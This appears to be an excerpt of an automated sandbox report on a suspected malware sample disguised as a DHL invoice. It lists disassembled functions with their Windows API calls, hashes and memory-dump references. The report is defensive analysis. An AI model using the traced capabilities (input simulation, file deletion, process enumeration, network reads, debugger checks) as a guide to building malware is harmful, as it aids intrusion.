                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00401270,000000FF,?,0000003F,00000000,?), ref: 0036BC36
                                                                                                                        • _free.LIBCMT ref: 0036BD4B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 314583886-0
                                                                                                                        • Opcode ID: 4b771f6423f7b0695a9a16ecbbd00232eef023a7adceb66fe2cc4795d3992010
                                                                                                                        • Instruction ID: 93602a0bea8ee5e86e0f824aa792dc619ab007b02ca1772f9a0e9c002e708588
                                                                                                                        • Opcode Fuzzy Hash: 4b771f6423f7b0695a9a16ecbbd00232eef023a7adceb66fe2cc4795d3992010
                                                                                                                        • Instruction Fuzzy Hash: C1C11975A042049FCB279F78CC41AAAFBB9EF41350F15C1AAE495EB259D7309E81CF50
                                                                                                                        Function 0039D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00333AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00333A97,?,?,00332E7F,?,?,?,00000000), ref: 00333AC2
                                                                                                                          • Part of subcall function 0039E199: GetFileAttributesW.KERNEL32(?,0039CF95), ref: 0039E19A
                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0039D420
                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 0039D470
                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0039D481
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0039D498
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0039D4A1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                        • String ID: \*.*
                                                                                                                        • API String ID: 2649000838-1173974218
                                                                                                                        • Opcode ID: 9199ca700f0164e4626c61a4f80577a1f417235c1977e36466b45ef91fd0d027
                                                                                                                        • Instruction ID: 47fe3c2c6fe5f99d8a10ac63505c0d2bd1de4f84176df40e26c57f1fd1c1ce0d
                                                                                                                        • Opcode Fuzzy Hash: 9199ca700f0164e4626c61a4f80577a1f417235c1977e36466b45ef91fd0d027
                                                                                                                        • Instruction Fuzzy Hash: D8315C710183459BC706EF64D8929AFB7A8AE91314F448E1DF4D5971A1EF20AA09CB63
                                                                                                                        Function 0036E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __floor_pentium4
                                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                        • API String ID: 4168288129-2761157908
                                                                                                                        • Opcode ID: 5c642285a41b7a578ff69738dc4362716adc86a4957abab0706dd8e7e1979771
                                                                                                                        • Instruction ID: f2b65f6e36d824acd251a2a20ae2c2d3b77a74e2328c6943c19d0429e7595902
                                                                                                                        • Opcode Fuzzy Hash: 5c642285a41b7a578ff69738dc4362716adc86a4957abab0706dd8e7e1979771
                                                                                                                        • Instruction Fuzzy Hash: E9C26E75E086288FDB26CF28DD407EAB7B9EB45305F1581EAD80DE7244E774AE858F40
                                                                                                                        Function 003A648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _wcslen.LIBCMT ref: 003A64DC
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 003A6639
                                                                                                                        • CoCreateInstance.OLE32(003CFCF8,00000000,00000001,003CFB68,?), ref: 003A6650
                                                                                                                        • CoUninitialize.OLE32 ref: 003A68D4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                        • String ID: .lnk
                                                                                                                        • API String ID: 886957087-24824748
                                                                                                                        • Opcode ID: 8be1e6542d808900d24988852ac8a9bf06c30b081e9bd7d7b8dfb0d46cf68d04
                                                                                                                        • Instruction ID: b49147b49d17ee3740a5433d712a262a59f0d61253e5a4e18755aaab5e295825
                                                                                                                        • Opcode Fuzzy Hash: 8be1e6542d808900d24988852ac8a9bf06c30b081e9bd7d7b8dfb0d46cf68d04
                                                                                                                        • Instruction Fuzzy Hash: 2CD13971508201AFD315EF24C882E6BB7E9FF95704F04496DF5958B2A1EB70ED05CB92
                                                                                                                        Function 003B22DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetForegroundWindow.USER32(?,?,00000000), ref: 003B22E8
                                                                                                                          • Part of subcall function 003AE4EC: GetWindowRect.USER32(?,?), ref: 003AE504
                                                                                                                        • GetDesktopWindow.USER32 ref: 003B2312
                                                                                                                        • GetWindowRect.USER32(00000000), ref: 003B2319
                                                                                                                        • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 003B2355
                                                                                                                        • GetCursorPos.USER32(?), ref: 003B2381
                                                                                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 003B23DF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2387181109-0
                                                                                                                        • Opcode ID: ebe05202b236739dd6d5565cdfe13699984ef63c7a80b0461657fb63135ba935
                                                                                                                        • Instruction ID: 624582774cf13172e0cd514bc8b7ffadd59e6790915dbb90eed1a0d585b9e2d0
                                                                                                                        • Opcode Fuzzy Hash: ebe05202b236739dd6d5565cdfe13699984ef63c7a80b0461657fb63135ba935
                                                                                                                        • Instruction Fuzzy Hash: 7431BE72504315ABDB22DF55C849E9BB7E9FB88314F000A19F989D7191DB34E909CB92
                                                                                                                        Function 003A9B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                                                                                                                        • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 003A9B78
                                                                                                                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 003A9C8B
                                                                                                                          • Part of subcall function 003A3874: GetInputState.USER32 ref: 003A38CB
                                                                                                                          • Part of subcall function 003A3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003A3966
                                                                                                                        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 003A9BA8
                                                                                                                        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 003A9C75
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 1972594611-438819550
                                                                                                                        • Opcode ID: 7c9a7fe37d6ad92bde28a4457294e4923a78b10abce00db776cb76fbc61ba643
                                                                                                                        • Instruction ID: e59ffa90888ece704b0d1197acc1cf245ffa9a5c0ea0056709b0b4e8e961b92b
                                                                                                                        • Opcode Fuzzy Hash: 7c9a7fe37d6ad92bde28a4457294e4923a78b10abce00db776cb76fbc61ba643
                                                                                                                        • Instruction Fuzzy Hash: 9441307194460A9FCF16DFA4C985BEEBBB8EF06311F248156E905B6191EB309E44CF60
                                                                                                                        Function 0034997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00349BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00349BB2
                                                                                                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 00349A4E
                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00349B23
                                                                                                                        • SetBkColor.GDI32(?,00000000), ref: 00349B36
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Color$LongProcWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3131106179-0
                                                                                                                        • Opcode ID: 30d893dec7e2f41d89bb7b65b2902b39ab7b960546b9ba9dc0c5d76044e7f70b
                                                                                                                        • Instruction ID: ccc2c9f3ac840612bc20cc63fcfbfd93267e7e63c35db068a32e50363d256a5f
                                                                                                                        • Opcode Fuzzy Hash: 30d893dec7e2f41d89bb7b65b2902b39ab7b960546b9ba9dc0c5d76044e7f70b
                                                                                                                        • Instruction Fuzzy Hash: 17A1FA70108554AEE727BA3C8C89F7B2ADEDB82350F26425BF502DEA91CA25FD01D375
                                                                                                                        Function 003B1806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 003B304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 003B307A
                                                                                                                          • Part of subcall function 003B304E: _wcslen.LIBCMT ref: 003B309B
                                                                                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 003B185D
                                                                                                                        • WSAGetLastError.WSOCK32 ref: 003B1884
                                                                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 003B18DB
                                                                                                                        • WSAGetLastError.WSOCK32 ref: 003B18E6
                                                                                                                        • closesocket.WSOCK32(00000000), ref: 003B1915
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1601658205-0
                                                                                                                        • Opcode ID: 6f846360ec075c4541c9f1a5530034d9101a4caa6f926ecb50699ad34919a3d6
                                                                                                                        • Instruction ID: 858fdf1ca7918442159595ea6ac2b36a1e2e5549f4d4394aac32936f18047765
                                                                                                                        • Opcode Fuzzy Hash: 6f846360ec075c4541c9f1a5530034d9101a4caa6f926ecb50699ad34919a3d6
                                                                                                                        • Instruction Fuzzy Hash: B551C675A002006FEB12AF24C8D6F6A77E5AB44718F44845CFA059F7D3C771AD418BA1
                                                                                                                        Function 00338060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                                                        • API String ID: 0-1546025612
                                                                                                                        • Opcode ID: 17eac49ce974cf8ad8fa92a7830afccd0b4cc022d234b9d3d630b4d7f949b4c2
                                                                                                                        • Instruction ID: 32c543e1319d82574ac451ef6b42341d37e8f0ea581a6d3d301411560b42454d
                                                                                                                        • Opcode Fuzzy Hash: 17eac49ce974cf8ad8fa92a7830afccd0b4cc022d234b9d3d630b4d7f949b4c2
                                                                                                                        • Instruction Fuzzy Hash: D4A2A174E0061ACBDF36CF58C8917AEB7B1BF44310F2585A9E819AB681DB749D81CF90
                                                                                                                        Function 00398298 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 568stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 003982AA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: lstrlen
                                                                                                                        • String ID: ($tb?$|
                                                                                                                        • API String ID: 1659193697-3876775998
                                                                                                                        • Opcode ID: 011e11ee03d21625ed6c75a066b0c00e80e9a1093640a698622d1a920157e426
                                                                                                                        • Instruction ID: 19b434b85b6818954757c90e8d4a3b2e87b616321c5a0961e58d22a92e9f8d09
                                                                                                                        • Opcode Fuzzy Hash: 011e11ee03d21625ed6c75a066b0c00e80e9a1093640a698622d1a920157e426
                                                                                                                        • Instruction Fuzzy Hash: 34323679A006059FCB29CF59C481A6AB7F0FF88710B15C46EE59ADB7A1EB70E941CB40
                                                                                                                        Function 003BA67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 003BA6AC
                                                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 003BA6BA
                                                                                                                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                                                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 003BA79C
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 003BA7AB
                                                                                                                          • Part of subcall function 0034CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00373303,?), ref: 0034CE8A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1991900642-0
                                                                                                                        • Opcode ID: 47f37fe2779efe3b3546e312b8d14499ada14d4fb9f8520678d8e61eaceae1b6
                                                                                                                        • Instruction ID: 7048ec05c7541bc8f3ef34f6fd1d815a2bcdab33873b74f8d3527209a8f8e499
                                                                                                                        • Opcode Fuzzy Hash: 47f37fe2779efe3b3546e312b8d14499ada14d4fb9f8520678d8e61eaceae1b6
                                                                                                                        • Instruction Fuzzy Hash: 4B514C75508700AFD711EF25C886A6BBBE8FF89754F00891DF589DB261EB70E904CB92
                                                                                                                        Function 0039AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0039AAAC
                                                                                                                        • SetKeyboardState.USER32(00000080), ref: 0039AAC8
                                                                                                                        • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0039AB36
                                                                                                                        • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0039AB88
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 432972143-0
                                                                                                                        • Opcode ID: 28bb049169103dfebe68eace05a3f8cbf38d26b140437faccb59a5c462e76f88
                                                                                                                        • Instruction ID: 3a30f7031821ea092ed3f1cc24f454f04d4cd3f1b9816adb6206d0b91777532a
                                                                                                                        • Opcode Fuzzy Hash: 28bb049169103dfebe68eace05a3f8cbf38d26b140437faccb59a5c462e76f88
                                                                                                                        • Instruction Fuzzy Hash: 16313930A40A08AFFF37CB69CC05BFA7BAAAB45310F04431AF585961D0D7749981C7E2
                                                                                                                        Function 003ACE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 003ACE89
                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 003ACEEA
                                                                                                                        • SetEvent.KERNEL32(?,?,00000000), ref: 003ACEFE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorEventFileInternetLastRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 234945975-0
                                                                                                                        • Opcode ID: b5ec1bb4e40fc9960099438e87d18a1fc80b891537a45d3c3b34056fca504000
                                                                                                                        • Instruction ID: 846471081dff75d0e1203f9e704612a671f28718d053a83691fded423dc8a8bd
                                                                                                                        • Opcode Fuzzy Hash: b5ec1bb4e40fc9960099438e87d18a1fc80b891537a45d3c3b34056fca504000
                                                                                                                        • Instruction Fuzzy Hash: 5321BDB1510305AFEB22CF65C948FA677FCEB02355F10582EE646D2551EB70EE08CB90
                                                                                                                        Function 00362622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 0036271A
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00362724
                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00362731
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3906539128-0
                                                                                                                        • Opcode ID: 94862e27eb190f6264ae365915462a1616b0b624d9041701aeeb16129acfa56d
                                                                                                                        • Instruction ID: 2ca9a34d2f398b57737d398b075726577ebed4bb580a4a943537b43efcaf787a
                                                                                                                        • Opcode Fuzzy Hash: 94862e27eb190f6264ae365915462a1616b0b624d9041701aeeb16129acfa56d
                                                                                                                        • Instruction Fuzzy Hash: 5831D67491121C9BCB22DF64DC88BDDB7B8AF08310F5081EAE80CA7261E7349F858F54
                                                                                                                        Function 003A51CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 003A51DA
                                                                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 003A5238
                                                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 003A52A1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
